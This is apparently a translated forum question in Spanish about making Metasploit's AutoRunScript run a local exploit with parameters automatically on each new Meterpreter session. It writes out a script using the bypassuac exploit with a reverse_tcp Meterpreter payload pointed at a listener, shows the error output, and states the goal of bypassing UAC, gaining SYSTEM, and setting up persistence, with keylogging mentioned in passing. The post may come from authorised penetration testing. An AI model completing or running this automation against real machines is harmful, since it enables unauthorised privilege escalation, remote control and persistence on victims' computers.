¿Hay alguna manera de ejecutar exploits que requieran parámetros, como el que está en el título, usando AutoRunScript?
Pude usar AutoRunScript para ejecutar algunos comandos de publicación perfectamente, como keylog_recorder
o checkvm
.
Pero cuando agregué mi script, esto:
use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit
Tengo esto:
[*] Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*] Running command set TARGET 0
[-] Unknown command: set.
[*] Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.
Claramente me estoy perdiendo algo aquí. ¿Cómo puedo hacer esto? Mi objetivo es poder omitir UAC, usar getsystem y luego obtener un punto de apoyo mediante las opciones de persistencia.
Como nota al margen, entiendo que usar "set SESSION 1" solo funcionará para la primera computadora del contrato. Necesitaría usar de alguna manera una variable para referirme a la sesión que se está iniciando actualmente.
¿Alguien tiene alguna solución para esto?